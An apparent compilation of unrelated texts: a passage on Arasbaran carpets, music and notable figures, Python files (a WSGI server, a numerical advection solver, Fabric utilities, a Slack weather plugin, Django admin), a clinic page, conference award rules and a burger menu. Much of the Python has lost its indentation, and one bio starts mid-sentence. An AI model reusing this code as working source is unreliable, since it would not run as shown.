Carpet weaving stands out as the acme of Azeri art, and the people of Arasbaran have significantly contributed to this artistic tradition. The Arasbaran carpet was a hybrid between the Persian carpet and the Azerbaijani rug. Still, there were indigenous styles, too. For instance, carpets known as Balan rugs had a size of approximately 1×4 m and a characteristic pattern.
The acme of carpet weaving art in Arasbaran is manifested in the Verni, which originated in Nagorno-Karabakh. The Verni is a carpet-like kilim with a delicate and fine warp and woof, woven without a previous sketch thanks to the creative talents of nomadic women and girls. Verni weavers employ images of birds and animals (deer, rooster, cat, snake, birds, gazelle, sheep, camel, wolf and eagle) in simple geometrical shapes, imitating the earthenware patterns that were popular in prehistoric times. A key décor feature intrinsic to many Vernis is the S-element. Its shape varies; it may resemble both the figure 5 and the letter S. This element means “dragon” among the nomads. At present, the Verni is woven by the girls of the Arasbaran tribes, often in the same room where the nomadic family resides, and is a significant income source for about 20,000 families.
These opening verses of a contemporary Ashugh song, composed by Məhəmməd Araz, may well represent the essence of Qaradağ's cultural identity: frequent allusions to a mountain with the intention of arousing an emotional state with a tone of mild melancholy, a state well expressed by Ashughi music.
A century of autocratic nation-building policies of the Pahlavi era in Iran succeeded in cultural assimilation in favor of a government-sanctioned culture. The mountainous region of Qaradağ, however, relatively escaped this demise due to its remoteness and inaccessibility. Many elements of the indigenous culture, particularly local music, have survived to the present day. More recently a slow but persistent cultural revival has been in progress, and the inhabitants, along with their city-dwelling relatives, perceive an awareness of their common cultural roots with the inhabitants of eastern Turkey and the Republic of Azerbaijan, where a cultural renaissance has been well underway since the collapse of the Soviet Union. Ashughi music is the cornerstone of this shared identity.
The number of ashughs has significantly increased since Aşiq Imran Heydəri (عاشیق ایمران حیدری) started accepting pupils in his academic-style classes in Tabriz. Imran's efforts effectively shifted the general impression of ashugh music from an association with nomadic life in the mountains to a music suited for performances in urban settings. At present, the de facto representative of the ashughs is Aşiq Rəsol Qorbani from Abbasabad village.
Up until the Islamic revolution the region had a subsistence economy: all food was produced within the villages and the surplus was bartered for items supplied by travelling salesmen. Most women spent the winter months weaving carpets using locally produced raw materials. Rainfed agriculture on the steep slopes had severely eroded the farms, productivity had dropped to unsustainably low levels, and the inhabitants had to supplement their income by taking seasonal construction jobs in Tehran. After the revolution, thanks to the construction of roads and the accessibility of larger town markets, livestock production became the dominant mode of the region's economy. However, quarrels over grazing rights didn't allow large-scale animal agriculture.
In recent years beekeeping has emerged as the only occupation that can provide a family with sufficient income. The honey produced in villages close to pastures is renowned for its quality and has an established niche market. Mardanaqom village is one of the main producers of honey.
Babak Fort, which is located on a mountain summit near Kaleybar, is a large citadel and National Symbol of Iranians and Iranian Azerbaijanis.
Jowshīn Fort (قلعه جوشین) is located in Varzaqan County. The fort was probably built in the fifth century.
Ahar Bazar (بازار اهر) is one of the Iranian national monuments. It is adorned in a spectacular fashion, with specific plaster moldings and unique oriental design. The bazaar is composed of various sections and has been repaired during the Qajar period.
The mausoleum of Sheikh Shihab-al-din. The monument was described by James Morier in the early nineteenth century as follows: "The mausoleum is of brick, with a foundation of stone, and faced by an elevated portico, flanked by two minors or pillars encrusted with green tiles. A little wooden door was opened for us in the back of the building, which introduced us into the spot that contained the tomb of the Sheikh, which was enclosed by a stone railing, carved into open work, and surrounded by a sculptured arabesque ornament, of very good taste. The tomb is distinguished by a marble cover, on which is an Arabic inscription in relieve."
Khoda Afarin bridges. Two bridges on the Aras river are located near Khomarlu. One bridge is badly damaged and the other is still usable for pedestrians. The latter bridge is 160 m in length.
Amir Arshad's residence (خانه امیر ارشد) in the Okhara village of Varzaqan County is still standing and has been registered as a historical site.
Qantoor building in Aynaloo is a mansion built in 1907 by a wealthy Armenian businessman. This landmark building is important in the context of highlighting the religious and ethnic tolerance that was a unique characteristic of the Arasbaran region.
Kordasht bath (حمام کردشت) is a royal bath built in the sixteenth century by king Abbas I of Persia.
Sattar Khan was originally from Qaradağ. He is considered a national hero of Iran and is referred to as سردار ملی (meaning National Commander). He led Constitutionalist rebels from the Amirkhiz district of Tabriz in the early twentieth century.
Babak Khorramdin, who until recently was fairly unknown to locals, is becoming a national hero, particularly among the new generation of Iranians, as a symbol of resistance against the Arab invasion twelve centuries ago. During the relative liberalism of the Khatami era (1997–2005), every year in the last week of June Azerbaijani nationalists celebrated his birthday symbolically at Babak Castle. Babak's legacy has been a controversial subject in academic and intellectual circles of Iran.
Amir Arshad, the headman of the Haji-Alilu tribe, was a legendary military commander in the early twentieth century. He is credited with fending off communism from Iran.
Rahimkhan Chalabianloo, the infamous chief of the Chalabianloo tribe, is known for opposing the Constitutionalists in the early twentieth century.
Karim Pasha Bahadori, a prominent landlord, was the secretary of the former queen, Farah Pahlavi.
Qasem Ahari was born in Ahar in 1884. He was the first European-trained ophthalmologist of Iran. Qasem Ahari served four terms in the National Consultative Assembly. He was the first representative of Azerbaijan in the Senate of Iran.
Asadollah Mohammadkhanlu, the headman of the Mohammad Khanlu tribe, was a feudal lord and influential politician during the Pahlavi era. He was among the first group of people whose properties were confiscated just after the Islamic Revolution.
Three generations of the Mirahmadi family from the Hasanbeyglu tribe have been significant political players at local and national levels since the Constitutional Revolution of the early twentieth century.
Andre Agassi, the retired professional tennis player and former World No. 1, is the son of a man originally from Arasbaran.
Aşıq Hoseyn Javan, born in Oti Kandi, is the legendary Ashik who was exiled to the Soviet Union due to his revolutionary songs during the brief reign of the Azerbaijan People's Government following World War II. Hoseyn Javan's music, in contrast to the contemporary poetry of Iran, emphasizes realism and highlights the beauties of real life. One of Hoseyn's songs, with the title "Kimin olacaqsan yari, bəxtəvər?", is among the most famous Ashugh songs.
Rasool Qorbani (رسول قربانی), recognized as the godfather among the masters of Ashugh music, was born in 1933 in Abbasabad. Rasool started his music career in 1952 and by 1965 was an accomplished Ashik. Rasool has performed in international music festivals held in France, Germany, the Netherlands, England, Japan, China, the Czech Republic, Slovakia, Austria, Australia, Azerbaijan, Serbia, Turkey and Hungary. Rasool has been awarded the highest art awards of the country, and will be honored by the government during the celebration of his 80th birthday. Changiz Mehdipour (چنگیز مهدیپور), born in Sheykh Hoseynlu, has significantly contributed to the revival and development of Ashugh music. His book on the subject attempts to adapt Ashugh music to the artistic taste of contemporary audiences.
Khanali Siami (1953–2013) was a famous photographer. His published photo-album is the first comprehensive visual presentation of East Azarbaijan Province. Since 2010, Ravanbakhsh Leysi, a high school teacher from Kaleybar, has followed in the footsteps of Siami in nature photography. Most photos in this article were taken by him.
Abbas Eslami (عباس بارز), known by his pen-name Barez (1932–2011), was a great poet. He described the melancholic demise of Qaradağ in a book titled Mourning Sabalan (ياسلي ساوالان).
Bahman Zamani, a rebel-poet, influenced the revolutionary generation of 1960-1980 by highlighting the pitiful state of Qaradağ under the centralist policies of the Pahlavi era. His most famous poem in this regard is Qaradağ (قرهداغ). Bahman is also famous for composing the song "Araz Araz Khan Araz" in memory of Samad Behrangi.
Sattar Golmohamadi and his nephew Mohamad Golmohamadi are contemporary poets, both of whom have dedicated their poems to the cultural identity of the Qaradağ region. Mohamad Golmohamadi's poem (قاراداغ اؤلکهسینین گؤر نئجه دیوانهسی ام) is a concise description of the region's cultural landscape.
Ayatollah Hojat (آیت الله العظمی سید محمد حجت کوهکمری) was one of the highest-ranking clerics of the twentieth century. He was the supreme legal authority, or source of emulation, for millions of Shia Muslims before the Iranian Revolution.
Prof. Mahmoud Akhondi (محمود آخوندى) was born in 1933. He is an eminent Swiss-trained law professor. His 10-volume book on criminal prosecution is a major textbook in Iranian law schools.
Colonel Husein Bybordi (حسين بايبوردي) was born in Ahar and retired from the Army in 1959. He wrote and published two books on the history of Arasbaran. His work is, perhaps, the only comprehensive original source on Arasbaran and on the Bybordi tribe, its history, and its migration.
Ḥusayn Dūstī (حسین دوستی) was born in Ahar. He is a prolific writer of books dealing with Arasbaran.
|
# This file is part of the Enkel web programming library.
#
# Copyright (C) 2007 Espen Angell Kristiansen ([email protected])
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
""" Defines a basic standalone WSGI server/handler.
WSGI is specified in PEP 333 which can be found
U{here <http://www.python.org/dev/peps/pep-0333>}.
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn, ForkingMixIn
from os import environ
from datetime import datetime
from sys import stderr
import logging
from server_base import WsgiServerMixIn, LoggerAsErrorFile
from apprunner import run_app, Response
from utils import rfc1123_date
from env import urlpath_to_environ
class HttpServerResponse(Response):
""" Adds automatic adding of required http headers
to the L{apprunner.Response} class. Headers are only added
when not supplied by the app. These headers are handled:
- server (defaults to L{__init__} parameter I{server_info})
- date (defaults to the UTC/GMT time when the response is sent)
"""
def __init__(self, server_info, *args, **kw):
super(HttpServerResponse, self).__init__(*args, **kw)
self.server_info = server_info
def validate_header(self, name, value):
if name in ("server", "date"):
try:
del self.extra_headers[name]
except KeyError:
pass
def generate_headers(self):
self.extra_headers["server"] = self.server_info
self.extra_headers["date"] = rfc1123_date(datetime.utcnow())
return super(HttpServerResponse, self).generate_headers()
class WsgiRequestHandler(BaseHTTPRequestHandler):
""" A WSGI request handler. You do not call this directly,
but send it as a parameter to L{Server.__init__}.
@cvar ENV: Default values for the WSGI environ dict. See
L{create_env} for more information.
"""
ENV = {}
def do_GET(self):
self.handle_wsgi_request("GET")
def do_POST(self):
self.handle_wsgi_request("POST")
def do_OPTIONS(self):
self.handle_wsgi_request("OPTIONS")
def do_HEAD(self):
self.handle_wsgi_request("HEAD")
def do_PUT(self):
self.handle_wsgi_request("PUT")
def do_DELETE(self):
self.handle_wsgi_request("DELETE")
def do_TRACE(self):
self.handle_wsgi_request("TRACE")
def do_CONNECT(self):
self.handle_wsgi_request("CONNECT")
def create_env(self, method):
""" Create the WSGI environ dict.
These variables are defined:
- byte strings:
- REQUEST_METHOD
- SERVER_PROTOCOL
- SERVER_NAME
- SERVER_PORT
- CONTENT_TYPE
- CONTENT_LENGTH
- REMOTE_ADDR
- wsgi.url_scheme
- wsgi.version
- wsgi.input (file-like object)
- wsgi.errors (file-like object)
- wsgi.multithread (bool)
- wsgi.run_once (bool)
And all HTTP-headers provided by the client prefixed with
'HTTP_'.
@note: This is the most minimal environment allowed by
PEP 333. You might wish to subclass this to provide
more environment variables.
@return: The WSGI environ dict to be sent to the application.
"""
env = self.ENV.copy()
if not (len(self.server.server_address) == 2 and \
isinstance(self.server.server_address[1], int)):
raise ValueError("can only listen to internet protocol "\
"server_address'es, like ('localhost', 8000).")
env.update({
"REQUEST_METHOD": method,
"SERVER_PROTOCOL": self.protocol_version,
"SERVER_NAME": self.server.server_address[0],
"SERVER_PORT": str(self.server.server_address[1]),
"CONTENT_TYPE": self.headers.get("content-type", ""),
"CONTENT_LENGTH": self.headers.get("content-length", ""),
"REMOTE_ADDR": self.client_address[0],
"wsgi.input": self.rfile
})
self.server.add_common_wsgienv(env)
        # Add all HTTP headers provided by the client. Per PEP 333,
        # header names are uppercased and dashes replaced by underscores.
        for name in self.headers:
            value = self.headers.get(name)
            env["HTTP_" + name.upper().replace("-", "_")] = value
return env
def handle_wsgi_request(self, method):
""" Create a WSGI environ dict (using L{create_env} and run
the app. """
# Create the WSGI environ dict
env = self.create_env(method)
self.server.log.info("connected by %s" % str(self.client_address))
# parse path
urlpath_to_environ(env, self.path)
req = HttpServerResponse(self.server.server_info, self.wfile, env,
self.server.debug)
run_app(self.server.app, req)
class Server(HTTPServer, WsgiServerMixIn):
""" A synchronous HTTP WSGI server.
Works more or less like L{scgi.Server} which is
much better documented.
"""
REQUEST_HANDLER = WsgiRequestHandler
url_scheme = "http"
log = logging.getLogger("enkel.wansgli.http.server")
applog = LoggerAsErrorFile(logging.getLogger(
"enkel.wansgli.http.app"))
def __init__(self, app, server_address=("",9000)):
"""
@param app: A WSGI app as defined in PEP 333.
"""
self.app = app
HTTPServer.__init__(self, server_address, self.REQUEST_HANDLER)
class ThreadingServer(ThreadingMixIn, Server):
""" A threading HTTP WSGI server. """
MULTITHREAD = True
class ForkingServer(ForkingMixIn, Server):
""" A forking HTTP WSGI server. """
MULTIPROCESS = True
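# A minimal usage sketch (hedged: hello_app below is a hypothetical example
# application, not part of the library). It serves on port 9000 with the
# synchronous Server; swap in ThreadingServer or ForkingServer for
# concurrent request handling.
def hello_app(environ, start_response):
    start_response("200 OK", [("content-type", "text/plain")])
    return ["Hello from the Enkel WSGI server!\n"]

if __name__ == "__main__":
    Server(hello_app, ("localhost", 9000)).serve_forever()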
|
Counsel to Governor Gary Johnson’s Libertarian campaign for U.S. Presidency.
on ballots. This earned Dearn a reputation as fearless as she single-handedly defeated some of the nation’s top-ranked election law attorneys in multiple eleventh-hour state electoral proceedings simultaneously. She is widely published on topics of law, politics and business and regularly speaks at business organizations and at universities. She is a regular contributor to The Andrea Kaye Show on AM 1170. She is also serving a two-year term as President of the Saint Louis chapter of the National Association of Professional Women.
|
from __future__ import division
import numpy as np
import scipy.sparse as sp
from scipy.sparse.linalg import splu
from pySDC.core.Problem import ptype
from pySDC.core.Errors import ParameterError, ProblemError
# noinspection PyUnusedLocal
class advection1d(ptype):
"""
Example implementing the unforced 1D advection equation with periodic BC in [0,1],
discretized using upwinding finite differences
Attributes:
A: FD discretization of the gradient operator using upwinding
dx: distance between two spatial nodes
"""
def __init__(self, problem_params, dtype_u, dtype_f):
"""
Initialization routine
Args:
problem_params (dict): custom parameters for the example
dtype_u: mesh data type (will be passed parent class)
dtype_f: mesh data type (will be passed parent class)
"""
# these parameters will be used later, so assert their existence
essential_keys = ['nvars', 'c', 'freq']
for key in essential_keys:
if key not in problem_params:
msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))
raise ParameterError(msg)
# we assert that nvars looks very particular here.. this will be necessary for coarsening in space later on
        if (problem_params['nvars']) % 2 != 0:
            raise ProblemError('setup requires an even number of dofs, e.g. nvars = 2^p')
if problem_params['freq'] >= 0 and problem_params['freq'] % 2 != 0:
raise ProblemError('need even number of frequencies due to periodic BCs')
if 'order' not in problem_params:
problem_params['order'] = 1
if 'type' not in problem_params:
problem_params['type'] = 'upwind'
# invoke super init, passing number of dofs, dtype_u and dtype_f
super(advection1d, self).__init__(init=problem_params['nvars'], dtype_u=dtype_u, dtype_f=dtype_f,
params=problem_params)
# compute dx and get discretization matrix A
self.dx = 1.0 / self.params.nvars
self.A = self.__get_A(self.params.nvars, self.params.c, self.dx, self.params.order, self.params.type)
@staticmethod
def __get_A(N, c, dx, order, type):
"""
Helper function to assemble FD matrix A in sparse format
Args:
N (int): number of dofs
c (float): diffusion coefficient
dx (float): distance between two spatial nodes
order (int): specifies order of discretization
type (string): upwind or centered differences
Returns:
scipy.sparse.csc_matrix: matrix A in CSC format
"""
coeff = None
stencil = None
zero_pos = None
if type == 'center':
if order == 2:
stencil = [-1.0, 0.0, 1.0]
zero_pos = 2
coeff = 1.0 / 2.0
elif order == 4:
stencil = [1.0, -8.0, 0.0, 8.0, -1.0]
zero_pos = 3
coeff = 1.0 / 12.0
elif order == 6:
stencil = [-1.0, 9.0, -45.0, 0.0, 45.0, -9.0, 1.0]
zero_pos = 4
coeff = 1.0 / 60.0
else:
raise ProblemError("Order " + str(order) + " not implemented.")
else:
if order == 1:
stencil = [-1.0, 1.0]
coeff = 1.0
zero_pos = 2
elif order == 2:
stencil = [1.0, -4.0, 3.0]
coeff = 1.0 / 2.0
zero_pos = 3
elif order == 3:
stencil = [1.0, -6.0, 3.0, 2.0]
coeff = 1.0 / 6.0
zero_pos = 3
elif order == 4:
stencil = [-5.0, 30.0, -90.0, 50.0, 15.0]
coeff = 1.0 / 60.0
zero_pos = 4
elif order == 5:
stencil = [3.0, -20.0, 60.0, -120.0, 65.0, 12.0]
coeff = 1.0 / 60.0
zero_pos = 5
else:
raise ProblemError("Order " + str(order) + " not implemented.")
dstencil = np.concatenate((stencil, np.delete(stencil, zero_pos - 1)))
offsets = np.concatenate(([N - i - 1 for i in reversed(range(zero_pos - 1))],
[i - zero_pos + 1 for i in range(zero_pos - 1, len(stencil))]))
doffsets = np.concatenate((offsets, np.delete(offsets, zero_pos - 1) - N))
A = sp.diags(dstencil, doffsets, shape=(N, N), format='csc')
A *= c * coeff * (1.0 / dx)
return A
def eval_f(self, u, t):
"""
Routine to evaluate the RHS
Args:
u (dtype_u): current values
t (float): current time
Returns:
dtype_f: the RHS
"""
f = self.dtype_f(self.init)
f.values = -1.0 * self.A.dot(u.values)
return f
def solve_system(self, rhs, factor, u0, t):
"""
Simple linear solver for (I+factor*A)u = rhs
Args:
rhs (dtype_f): right-hand side for the linear system
factor (float) : abbrev. for the node-to-node stepsize (or any other factor required)
u0 (dtype_u): initial guess for the iterative solver (not used here so far)
t (float): current time (e.g. for time-dependent BCs)
Returns:
dtype_u: solution as mesh
"""
me = self.dtype_u(self.init)
L = splu(sp.eye(self.params.nvars, format='csc') + factor * self.A)
me.values = L.solve(rhs.values)
return me
def u_exact(self, t):
"""
Routine to compute the exact solution at time t
Args:
t (float): current time
Returns:
dtype_u: exact solution
"""
me = self.dtype_u(self.init)
if self.params.freq >= 0:
xvalues = np.array([i * self.dx for i in range(self.params.nvars)])
me.values = np.sin(np.pi * self.params.freq * (xvalues - self.params.c * t))
else:
np.random.seed(1)
me.values = np.random.rand(self.params.nvars)
return me
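# A minimal usage sketch (hedged: the mesh import path below is an
# assumption based on pySDC's layout in this release line; it supplies the
# dtype_u/dtype_f data types expected by the constructor).
if __name__ == '__main__':
    from pySDC.implementations.datatype_classes.mesh import mesh

    demo_params = {'nvars': 128, 'c': 1.0, 'freq': 2}
    prob = advection1d(demo_params, dtype_u=mesh, dtype_f=mesh)
    u0 = prob.u_exact(0.0)                      # sinusoidal initial condition
    f0 = prob.eval_f(u0, 0.0)                   # RHS evaluation: -c * (A u)
    u1 = prob.solve_system(u0, 0.01, u0, 0.01)  # one implicit solve of (I + factor*A) u = rhs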
|
This is a multidisciplinary service led by Miss Lynne Robinson with recognised national expertise in the field.
The clinic provides a holistic approach to the management of the menopause and associated health conditions, with a focus on counselling on the personalised benefits and risks associated with using hormone replacement therapy (HRT), and alternative and complementary therapies.
Treatment and advice incorporate the best evidence and use the framework of the NICE guideline (2015) Menopause: Diagnosis and Management and British Menopause Society guidance. They are individualised according to personal health risks and benefits. The advice is aimed at relieving symptoms and promoting long-term health.
It is important to note that risks associated with HRT use in postmenopausal women over the age of 51 are not always applicable to women under the age of 51. HRT should be taken up to the average age of the menopause to avoid premature cardiovascular disease or osteoporosis.
The clinic also has expertise in the management of women with premature ovarian insufficiency under the age of forty. These younger women have specific needs. This includes consideration of possible long-term health implications and fertility advice. Find out more at The Daisy Network (support network). There is a direct link to the fertility service for women also seeking fertility treatment.
Women started on hormone implants are followed up in the specialist Wednesday clinic.
Birmingham Women's Hospital is fortunate to have direct access to the wider multidisciplinary team of specialist services within the building: weight management, counselling, psychosexual counselling, physiotherapy, urogynaecology, and fertility services.
Implant appointments are every 4 to 8 months. Blood levels are used to guide therapy. You will be given individualised guidance about the need for an oestrogen blood test before the appointment. Blood tests can be done at your GP's surgery, but the results must be brought with you in person.
Led by our Clinical Nurse Specialists.
Should you require help, advice or support between your clinic appointments, there is an answerphone helpline service run by the specialist nurses. You may be offered the opportunity to have follow-up appointments or receive some test results via telephone consultation. The aim is to provide a convenient and efficient service that avoids unnecessary trips to hospital. Once you are discharged from the outpatient clinic, clear advice is sent to your GP regarding future management. Advice can still be sought from the telephone support service, but it may be necessary for us to request a re-referral to the menopause clinic if it has been more than 12 months since your last appointment.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import shutil
import tarfile
import tempfile
from fabric.api import run, sudo
from fabric.context_managers import documented_contextmanager
from dockermap.shortcuts import rm, chmod, chown
from .output import single_line_stdout
_safe_name = lambda tarinfo: tarinfo.name[0] != '/' and '..' not in tarinfo.name
def get_remote_temp():
"""
Creates a temporary directory on the remote end. Uses the command ``mktemp`` to do so.
:return: Path to the temporary directory.
:rtype: unicode
"""
return single_line_stdout('mktemp -d')
def remove_ignore(path, use_sudo=False):
"""
Recursively removes a file or directory, ignoring any errors that may occur. Should only be used for temporary
files that can be assumed to be cleaned up at a later point.
:param path: Path to file or directory to remove.
:type path: unicode
:param use_sudo: Use the `sudo` command.
:type use_sudo: bool
"""
which = sudo if use_sudo else run
which(rm(path, recursive=True), warn_only=True)
def is_directory(path, use_sudo=False):
"""
Check if the remote path exists and is a directory.
:param path: Remote path to check.
:type path: unicode
:param use_sudo: Use the `sudo` command.
:type use_sudo: bool
:return: `True` if the path exists and is a directory; `False` if it exists, but is a file; `None` if it does not
exist.
:rtype: bool or ``None``
"""
result = single_line_stdout('if [[ -f {0} ]]; then echo 0; elif [[ -d {0} ]]; then echo 1; else echo -1; fi'.format(path), sudo=use_sudo, quiet=True)
if result == '0':
return False
elif result == '1':
return True
else:
return None
@documented_contextmanager
def temp_dir(apply_chown=None, apply_chmod=None):
"""
Creates a temporary directory on the remote machine. The directory is removed when no longer needed. Failure to do
so will be ignored.
    :param apply_chown: Optional; change the owner of the directory (user or user:group specification).
    :type apply_chown: unicode
    :param apply_chmod: Optional; change the permissions of the directory (chmod mode specification).
    :type apply_chmod: unicode
:return: Path to the temporary directory.
:rtype: unicode
"""
path = get_remote_temp()
if apply_chmod:
run(chmod(apply_chmod, path))
if apply_chown:
sudo(chown(apply_chown, path))
yield path
remove_ignore(path, True)
@documented_contextmanager
def local_temp_dir():
"""
Creates a local temporary directory. The directory is removed when no longer needed. Failure to do
so will be ignored.
:return: Path to the temporary directory.
:rtype: unicode
"""
path = tempfile.mkdtemp()
yield path
shutil.rmtree(path, ignore_errors=True)
def extract_tar(filename, dest_path, **kwargs):
"""
Extracts a TAR archive. All element names starting with ``/`` (indicating an absolute path) or that contain ``..``
as references to a parent directory are not extracted.
:param filename: Path to the tar file.
:type filename: unicode
:param dest_path: Destination path to extract the contents to.
:type dest_path: unicode
:param kwargs: Additional kwargs for opening the TAR file (:func:`tarfile.open`).
"""
with tarfile.open(filename, 'r', **kwargs) as tf:
        safe_members = [member for member in tf.getmembers() if _safe_name(member)]
if safe_members:
tf.extractall(dest_path, safe_members)
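# A minimal usage sketch (hypothetical helper; assumes a configured Fabric
# environment with a reachable host). It unpacks an archive locally with the
# safety filter applied, then stages the original file in a self-cleaning
# remote temporary directory.
def stage_archive(local_tar):
    from fabric.api import put

    with local_temp_dir() as local_path:
        extract_tar(local_tar, local_path)  # members with absolute or '..' paths are skipped
    with temp_dir(apply_chmod='0700') as remote_path:
        put(local_tar, remote_path)  # the remote directory is removed afterwards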
|
The American Transplant Congress will grant a number of awards for outstanding work that is submitted through the ATC 2019 abstract submission.
This award is designed to recognize a Young Investigator's outstanding work and to help offset the expense of attending the Congress.
An individual must be the first author on a submitted abstract and must present the abstract during ATC 2019.
An individual must be a Trainee within two (2) years of completion of their training and/or fellowship in a program with which either an ASTS or AST member is associated.
A signed letter from the Trainee's program director identifying and requesting travel support needs to be uploaded at the time of abstract submission.
No exceptions will be made should the criteria above not be met.
ATC attendees will have the opportunity to vote for the Best in Congress Posters presented during each poster session. Voting will be done via the ATC mobile application.
Should your poster be selected, ATC will send you a notification to submit a PowerPoint or PDF of your poster.
Your poster PowerPoint or PDF will then be displayed on a large monitor the morning after your poster presentation.
The monitor will be displayed on Level 2 of the John B. Hynes Convention Center.
|
# -*- coding: utf-8 -*-
"""!weather <zip or place name> return the 5-day forecast
Three environment variables control the behavior of this plugin:
MAPBOX_API_TOKEN: must be set to a valid Mapbox API token
https://docs.mapbox.com/api/search/#geocoding
OPENWEATHER_API_KEY: must be set to a valid OpenWeather API key
https://openweathermap.org/current
https://openweathermap.org/forecast5
WEATHER_CELSIUS: if this environment variable is present with any value,
the plugin will report temperatures in celsius instead of
fahrenheit
"""
try:
    from urllib import quote  # Python 2
except ImportError:
    from urllib.parse import quote  # Python 3
import json
import os
import re
from datetime import datetime
import requests
# https://openweathermap.org/weather-conditions
ICONMAP = {
"01d": ":sunny:",
"01n": ":moon:",
"02d": ":sun_behind_cloud:",
"02n": ":sun_behind_cloud:",
"03d": ":cloud:",
"03n": ":cloud:",
"04d": ":cloud:",
"04n": ":cloud:",
"09d": ":rain_cloud:",
"09n": ":rain_cloud:",
"10d": ":sun_behind_rain_cloud:",
"10n": ":sun_behind_rain_cloud:",
"11d": ":thunder_cloud_and_rain:",
"11n": ":thunder_cloud_and_rain:",
"13d": ":snowflake:",
"13n": ":snowflake:",
"50d": ":fog:",
"50n": ":fog:",
}
CELSIUS = "metric"
IMPERIAL = "imperial"
MAPBOX_API_TOKEN = os.environ.get("MAPBOX_API_TOKEN")
OPENWEATHER_API_KEY = os.environ.get("OPENWEATHER_API_KEY")
def weather(searchterm):
"""Get the weather for a place given by searchterm
Returns a title and a list of forecasts.
The title describes the location for the forecast (i.e. "Portland, ME USA")
The list of forecasts is a list of dictionaries in slack attachment fields
format (see https://api.slack.com/docs/message-attachments)
"""
unit = CELSIUS if os.environ.get("WEATHER_CELSIUS") else IMPERIAL
unit_abbrev = "f" if unit == IMPERIAL else "c"
geo = requests.get(
"https://api.mapbox.com/geocoding/v5/mapbox.places/{}.json?limit=1&access_token={}".format(
quote(searchterm.encode("utf8")), MAPBOX_API_TOKEN
)
).json()
citystate = geo["features"][0]["place_name"]
lon, lat = geo["features"][0]["center"]
title = "Weather for {}: ".format(citystate)
forecast = requests.get(
"https://api.openweathermap.org/data/2.5/forecast/daily?lat={:.2f}&lon={:.2f}&cnt=4&units={}&appid={}".format(
lat, lon, unit, OPENWEATHER_API_KEY
)
).json()
if forecast["cod"] != "200":
raise KeyError("Invalid OpenWeatherMap key")
messages = []
for cast in forecast["list"]:
# do I need to mess with tz at all, or is this accurate enough?
dt = datetime.fromtimestamp(cast["dt"]).strftime("%A")
high = int(round(cast["temp"]["max"]))
icon = ICONMAP.get(cast["weather"][0]["icon"], ":question:")
messages.append(
{
"title": dt,
"value": u"{} {}°{}".format(icon, high, unit_abbrev),
"short": True,
}
)
return title, messages
def on_message(msg, server):
text = msg.get("text", "")
match = re.findall(r"!weather (.*)", text)
if not match:
return
try:
title, forecasts = weather(match[0])
except KeyError as err:
return "KeyError: {}".format(err.args[0])
attachment = {"fallback": title, "pretext": title, "fields": forecasts[0:4]}
server.slack.post_message(
msg["channel"],
"",
as_user=server.slack.username,
attachments=json.dumps([attachment]),
thread_ts=msg.get("thread_ts", None),
)
on_bot_message = on_message
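# Example interaction (hypothetical output; assumes MAPBOX_API_TOKEN and
# OPENWEATHER_API_KEY hold valid credentials):
#
#   !weather portland me
#   Weather for Portland, Maine, United States:
#   Monday :sunny: 72°f | Tuesday :rain_cloud: 65°f | ...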
|
All natural 100% Canadian Angus beef, Canadian cheddar, sweet relish, red onion, tomato and hero sauce on a sesame poppy bun.
Two 4 oz. 100% Canadian Angus beef patties, 2 slices of Canadian cheddar, sweet relish, tomatoes, red onion and hero sauce on a sesame poppy bun.
470 Cals, 100% vegetarian soy patty topped with sauteed onions, portobello, jalapenos, lettuce and hot sauce.
All natural 100% Canadian Angus beef, fried egg, strip bacon and tomato on a sesame poppy bun.
All natural 100% Canadian Angus beef topped with a fried onion ring, guacamole, bacon, smoked white cheddar, lettuce, tomato and hero sauce on a sesame poppy bun.
580 Cals, grilled chicken breast rolled in signature Cajun spice, topped with smoked white cheddar, lettuce, tomato, red onion and hero sauce on a ciabatta bun.
All natural 100% Canadian Angus beef, creamy blue cheese, portobello mushrooms, lettuce and tomato on a sesame poppy bun.
590 Cals, crispy chicken fillet, Mutti Italian tomato sauce, parmigiano, real cheese and ciabatta.
610 Cals, grilled chicken breast, roasted red peppers, blue cheese, portobello mushrooms and mayonnaise on an Ace Bakery ciabatta bun.
490 Cals, 100% Angus beef hot dog topped with Canadian cheddar, hero sauce and Slawsa.
All natural 100% Canadian Angus beef topped with hand-rubbed beef bacon, smoked white cheddar, lettuce, tomato and hero sauce on a sesame poppy bun.
485 Cals, fresh cut fries, cooked in trans fat free oil.
800 Cals, fresh cut fries, real cheese curds and non-GMO vegetarian gravy.
350 Cals, Hero Certified's own crunchy chicken strips; comes with six to seven pieces.
960 Cals, fresh cut fries, Angus beef chunks, real cheese curds and non-GMO vegetarian gravy.
350 Cals, fresh cut fries, Angus beef chunks, real cheese curds and non-GMO vegetarian gravy.
810 Cals, fresh cut fries, portobello mushrooms, real cheese curds and non-GMO vegetarian gravy.
|
import os
from django.contrib import admin
from django.conf import settings
from apps.pages.models import Page, Page_translation
from apps.pages.forms import Page_translationInlineForm, PageForm
class Page_translationInline(admin.StackedInline):
model = Page_translation
form = Page_translationInlineForm
verbose_name = 'Lang'
extra = 0
fieldsets = [
('Content', {'fields': ['lang', 'menu', 'name', 'col_central',
'youtube', 'photo_description', 'col_right',
'col_bottom_1', 'col_bottom_2', 'col_bottom_3'],
'classes': ['collapse']}),
('SEO', {'fields': ['meta_title', 'meta_description', 'meta_keywords',
'photo_alt'], 'classes': ['collapse']}),
]
search_fields = ['col_central', 'col_right', 'col_bottom_1', 'col_bottom_2',
'col_bottom_3']
max_num = len(settings.LANGUAGES)
def get_queryset(self, request):
return Page_translation.objects.filter(lang__in=[x[0] for x in settings.LANGUAGES])
class PageAdmin(admin.ModelAdmin):
form = PageForm
inlines = [Page_translationInline]
save_on_top = True
readonly_fields = ('photo_thumb',)
view_on_site = True
def date_update(self, model):
return model.updated_at.strftime('%d %B %Y, %H:%M')
